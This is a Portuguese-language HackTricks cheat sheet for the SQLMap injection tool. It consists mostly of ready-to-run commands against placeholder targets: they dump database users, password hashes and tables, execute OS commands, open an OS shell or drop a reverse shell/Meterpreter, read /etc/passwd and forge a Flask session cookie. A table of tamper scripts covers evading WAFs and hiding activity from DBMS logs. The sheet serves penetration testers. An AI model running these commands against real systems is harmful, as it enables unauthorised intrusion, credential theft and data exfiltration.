hacktricks/pentesting-web/sql-injection/sqlmap
2024-07-29 09:26:18 +00:00
..
README.md Translated ['README.md', 'network-services-pentesting/512-pentesting-rex 2024-07-29 09:26:18 +00:00
second-order-injection-sqlmap.md Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:12:26 +00:00

SQLMap - Cheetsheat

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Configuração disponível instantaneamente para avaliação de vulnerabilidades e testes de penetração. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão de reconhecimento a relatórios. Não substituímos os pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para dar a eles mais tempo para investigar mais a fundo, estourar shells e se divertir.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

Argumentos básicos para SQLmap

Genérico

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

Recuperar Informações

Interno

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

Dados do DB

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Injection place

From Burp/ZAP capture

Capture a solicitação e crie um arquivo req.txt

sqlmap -r req.txt --current-user

Injeção de Requisição GET

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

Injeção de Requisição POST

sqlmap -u "http://example.com" --data "username=*&password=*"

Injeções em Cabeçalhos e outros Métodos HTTP

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Indique a string quando a injeção for bem-sucedida

--string="string_showed_when_TRUE"

Eval

Sqlmap permite o uso de -e ou --eval para processar cada payload antes de enviá-lo com um oneliner em python. Isso torna muito fácil e rápido processar de maneiras personalizadas o payload antes de enviá-lo. No exemplo a seguir, a sessão de cookie do flask é assinada pelo flask com o segredo conhecido antes de enviá-la:

sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

Shell

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Ler Arquivo

--file-read=/etc/passwd

Rastrear um site com SQLmap e auto-exploração

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Injeção de Segunda Ordem

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Leia este post sobre como realizar injeções de segunda ordem simples e complexas com sqlmap.

Personalizando a Injeção

Definir um sufixo

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Prefixo

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Ajuda para encontrar injeção booleana

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

Lembre-se de que você pode criar seu próprio tamper em python e é muito simples. Você pode encontrar um exemplo de tamper na página de Injeção de Segunda Ordem aqui.

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Tamper Descrição
apostrophemask.py Substitui o caractere apóstrofo pelo seu equivalente de largura total em UTF-8
apostrophenullencode.py Substitui o caractere apóstrofo pelo seu equivalente ilegal de unicode duplo
appendnullbyte.py Anexa um caractere NULL byte codificado no final do payload
base64encode.py Codifica em Base64 todos os caracteres em um payload dado
between.py Substitui o operador maior que ('>') por 'NOT BETWEEN 0 AND #'
bluecoat.py Substitui o caractere de espaço após a instrução SQL por um caractere em branco aleatório válido. Em seguida, substitui o caractere = pelo operador LIKE
chardoubleencode.py Codifica duas vezes todos os caracteres em um payload dado (não processando já codificados)
commalesslimit.py Substitui instâncias como 'LIMIT M, N' por 'LIMIT N OFFSET M'
commalessmid.py Substitui instâncias como 'MID(A, B, C)' por 'MID(A FROM B FOR C)'
concat2concatws.py Substitui instâncias como 'CONCAT(A, B)' por 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
charencode.py Codifica em URL todos os caracteres em um payload dado (não processando já codificados)
charunicodeencode.py Codifica caracteres não codificados em unicode-url em um payload dado (não processando já codificados). "%u0022"
charunicodeescape.py Codifica caracteres não codificados em unicode-url em um payload dado (não processando já codificados). "\u0022"
equaltolike.py Substitui todas as ocorrências do operador igual ('=') pelo operador 'LIKE'
escapequotes.py Escapa aspas (' e ") com barra invertida
greatest.py Substitui o operador maior que ('>') pelo seu equivalente 'GREATEST'
halfversionedmorekeywords.py Adiciona um comentário MySQL versionado antes de cada palavra-chave
ifnull2ifisnull.py Substitui instâncias como 'IFNULL(A, B)' por 'IF(ISNULL(A), B, A)'
modsecurityversioned.py Envolve a consulta completa com um comentário versionado
modsecurityzeroversioned.py Envolve a consulta completa com um comentário de versão zero
multiplespaces.py Adiciona múltiplos espaços ao redor das palavras-chave SQL
nonrecursivereplacement.py Substitui palavras-chave SQL predefinidas por representações adequadas para substituição (por exemplo, .replace("SELECT", "")) filtros
percentage.py Adiciona um sinal de porcentagem ('%') na frente de cada caractere
overlongutf8.py Converte todos os caracteres em um payload dado (não processando já codificados)
randomcase.py Substitui cada caractere de palavra-chave por um valor de caso aleatório
randomcomments.py Adiciona comentários aleatórios às palavras-chave SQL
securesphere.py Anexa uma string especialmente elaborada
sp_password.py Anexa 'sp_password' ao final do payload para ofuscação automática dos logs do DBMS
space2comment.py Substitui o caractere de espaço (' ') por comentários
space2dash.py Substitui o caractere de espaço (' ') por um comentário de traço ('--') seguido por uma string aleatória e uma nova linha ('\n')
space2hash.py Substitui o caractere de espaço (' ') por um caractere de libra ('#') seguido por uma string aleatória e uma nova linha ('\n')
space2morehash.py Substitui o caractere de espaço (' ') por um caractere de libra ('#') seguido por uma string aleatória e uma nova linha ('\n')
space2mssqlblank.py Substitui o caractere de espaço (' ') por um caractere em branco aleatório de um conjunto válido de caracteres alternativos
space2mssqlhash.py Substitui o caractere de espaço (' ') por um caractere de libra ('#') seguido por uma nova linha ('\n')
space2mysqlblank.py Substitui o caractere de espaço (' ') por um caractere em branco aleatório de um conjunto válido de caracteres alternativos
space2mysqldash.py Substitui o caractere de espaço (' ') por um comentário de traço ('--') seguido por uma nova linha ('\n')
space2plus.py Substitui o caractere de espaço (' ') por um sinal de mais ('+')
space2randomblank.py Substitui o caractere de espaço (' ') por um caractere em branco aleatório de um conjunto válido de caracteres alternativos
symboliclogical.py Substitui operadores lógicos AND e OR por seus equivalentes simbólicos (&& e
unionalltounion.py Substitui UNION ALL SELECT por UNION SELECT
unmagicquotes.py Substitui o caractere de aspas (') por uma combinação de múltiplos bytes %bf%27 junto com um comentário genérico no final (para funcionar)
uppercase.py Substitui cada caractere de palavra-chave por um valor em maiúsculas 'INSERT'
varnish.py Anexa um cabeçalho HTTP 'X-originating-IP'
versionedkeywords.py Envolve cada palavra-chave não funcional com um comentário MySQL versionado
versionedmorekeywords.py Envolve cada palavra-chave com um comentário MySQL versionado
xforwardedfor.py Anexa um cabeçalho HTTP falso 'X-Forwarded-For'

Configuração instantaneamente disponível para avaliação de vulnerabilidades e testes de penetração. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão da recon à geração de relatórios. Não substituímos os pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para dar a eles mais tempo para investigar mais a fundo, explorar vulnerabilidades e se divertir.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}